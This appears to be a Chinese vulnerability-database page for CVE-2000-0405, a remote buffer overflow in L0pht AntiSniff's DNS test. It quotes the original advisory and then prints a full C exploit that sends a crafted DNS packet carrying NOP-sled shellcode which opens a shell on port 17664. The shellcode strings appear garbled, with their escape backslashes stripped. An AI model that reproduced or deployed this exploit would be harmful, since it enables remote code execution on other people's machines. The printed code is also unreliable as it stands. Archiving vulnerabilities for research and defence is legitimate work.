AntiSniff DNS缓冲区溢出漏洞。

漏洞ID	1105834	漏洞类型	缓冲区溢出
发布时间	2000-05-16	更新时间	2005-05-02
CVE编号	CVE-2000-0405	CNNVD-ID	CNNVD-200005-060
漏洞平台	Multiple	CVSS评分	10.0

|漏洞来源

https://www.exploit-db.com/exploits/19917
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200005-060

|漏洞详情

L0phtAntiSniff存在缓冲区溢出漏洞，远程攻击者可以通过异常DNS响应包执行任意命令。

|漏洞EXP

source: http://www.securityfocus.com/bid/1207/info
 
Certain versions of @Stake Inc.'s Antisniffer software contain a remotely exploitable buffer overflow. AntiSniff is a program that was released by L0pht Heavy Industries in July of 1999. It attempts, through a number of tests, to determine if a machine on a local network segment is listening to traffic that is not directed to it (commonly referred to as sniffing). During one particular test there is a problem if a packet that does not adhere to DNS specifications is sent to the AntiSniff machine. This can result in a buffer overflow on the system running AntiSniff. If the packet is crafted appropriately this overflow scenario can be exploited to execute arbitrary code on the system.
 
This scenario is only possible if AntiSniff is configured to run the DNS test and only during the time the test is running. Nonetheless, it is a vulnerability that should not be ignored and has even been found in other promiscuous mode detection programs as well.
 
NOTE:
 
This information was taken verbatim from the L0pht advisory on the subject. This advisory is attached in full in the 'Credit' section of this advisory.

/* l0phtl0phe.c - antisniff exploit (1.02 included)
 *
 * -sc/teso
 *
 * gcc -o l0phtl0phe l0phtl0phe.c -Wall -lnet `libnet-config --defines`
 *
 * description:
 * l0pht messed up the fix for their problem in antisniff by not regarding
 * the type signedness properties of the char and int values used. this
 * results in a cool method bypassing the too extra checks (length + strncat).
 * some work on this topic have been done by mixter, (bad results on type
 * casting), but it should be obvious to any security conscious programmers.
 * i'm not stating that they aren't allowed errors, but they should fix it
 * for sure if they're going to fix it at all.  -sc.
 *
 * greetings to all teso, lam3rz, hert, adm, w00w00 and lds ppl.
 */

#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <arpa/nameser.h>
#include <libnet.h>


#define	OFFSET		0xbffef9a0

unsigned int	build_xp (unsigned char *xp);


int
main (int argc, char *argv[])
{
	int		sock;		/* raw socket */
	u_long		src_ip,
			dst_ip;

	unsigned char	xpbuf[512];	/* this one gets complicated now */
	unsigned char	tpack[512];	/* paket buffer */
	unsigned int	pl_len;


	if (argc != 3) {
		printf ("usage: %s <source ip> <dest ip>nn", argv[0]);

		exit (EXIT_FAILURE);
	}

	sock = libnet_open_raw_sock (IPPROTO_RAW);
	if (sock == -1) {
		perror ("libnet_open_raw_sock");
		exit (EXIT_FAILURE);
	}

	src_ip  = libnet_name_resolve (argv[1], 0);
	dst_ip  = libnet_name_resolve (argv[2], 0);

	pl_len = build_xp (xpbuf);

	libnet_build_ip (UDP_H + DNS_H + pl_len, 0, 7350, 0, 2, IPPROTO_UDP,
		src_ip, dst_ip, NULL, 0, tpack);
	libnet_build_udp (libnet_get_prand (PRu16), 53, NULL, 0,
		tpack + IP_H);
	libnet_build_dns (libnet_get_prand (PRu16), 0x0000, 1, 0, 0, 0,
		xpbuf, pl_len, tpack + IP_H + UDP_H);
	libnet_do_checksum (tpack, IPPROTO_UDP, UDP_H + DNS_H + pl_len);

	/* they use "udp and dst port 53" as bpf, so we should have no problem
	 */
	libnet_write_ip (sock, tpack, UDP_H + IP_H + DNS_H + pl_len);
	libnet_close_raw_sock (sock);

	printf ("exploitation succeeded.n");
	printf ("try: "telnet %s 17664" now.n", argv[2]);

	exit (EXIT_SUCCESS);
}


/* build_xp
 *
 * build exploit buffer into buffer pointed to by `xp'.
 */

unsigned int
build_xp (unsigned char *xp)
{




	/* yea yea ugly buffer ;-) */
	unsigned char	buf[] =
		"x7cx90x90x90x90x90x90x90x90x90x90x90x90x90x90"
		"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
		"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
		"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
		"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
		"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
		"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
		"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
		"x90x90x90xebx01"
		"x7dx90x90x90x90x90x90x90x90x90x90x90x90x90x90"
		"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
		"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
		"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
		"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
		"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
		"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
		"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
		"x90x90x90xebx08x00"
		"xfex10x10xffxbfx90x90x90x90x90x90x90x90x90x90"
		"x90x90xebx20"
		"x90x90x90x90"
		"x3cxf8xfexbfx90x90x90x90x90x90x90x90x90x90x90"
		"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

		/* portshell 17644 portshellcode by smiler & scut */
		"x31xc0xb0x02xcdx80x09xc0x74x06x31xc0"
		"xfexc0xcdx80xebx76x5fx89x4fx10xfexc1"
		"x89x4fx0cxfexc1x89x4fx08x8dx4fx08xfe"
		"xc3xb0x66xcdx80xfexc3xc6x47x10x10x66"
		"x89x5fx14x88x47x08xb0x45x66x89x47x16"
		"x89x57x18x8dx4fx14x89x4fx0cx8dx4fx08"
		"xb0x66xcdx80x89x5fx0cxfexc3xfexc3xb0"
		"x66xcdx80x89x57x0cx89x57x10xfexc3xb0"
		"x66xcdx80x31xc9x88xc3xb0x3fxcdx80xfe"
		"xc1xb0x3fxcdx80xfexc1xb0x3fxcdx80x31"
		"xd2x88x57x07x89x7fx0cx89xfbx8dx4fx0c"
		"xb0x0bxcdx80x31xc0x99x31xdbx31xc9xe8"
		"x7exffxffxffx2fx62x69x6ex2fx73x68";

	buf[287] = (OFFSET      ) & 0xff;
	buf[288] = (OFFSET >>  8) & 0xff;
	buf[289] = (OFFSET >> 16) & 0xff;
	buf[290] = (OFFSET >> 24) & 0xff;

	memcpy (xp, buf, sizeof (buf));

	return (sizeof (buf));;
}

|参考资料

来源:L0PHT
名称:20000515AntiSniffversion1.01andResearchersversion1DNSoverflow
链接:http://www.l0pht.com/advisories/asniff_advisory.txt
来源:BID
名称:1207
链接:http://www.securityfocus.com/bid/1207
来源:OSVDB
名称:3179
链接:http://www.osvdb.org/3179

相关推荐: Rockliffe MailSite 4.2.1.0 Buffer Overflow Vulnerability

Rockliffe MailSite 4.2.1.0 Buffer Overflow Vulnerability 漏洞ID 1104161 漏洞类型 Boundary Condition Error 发布时间 2000-05-24 更新时间 2000-05-2…

文章版权归作者所有，未经允许请勿转载。

THE END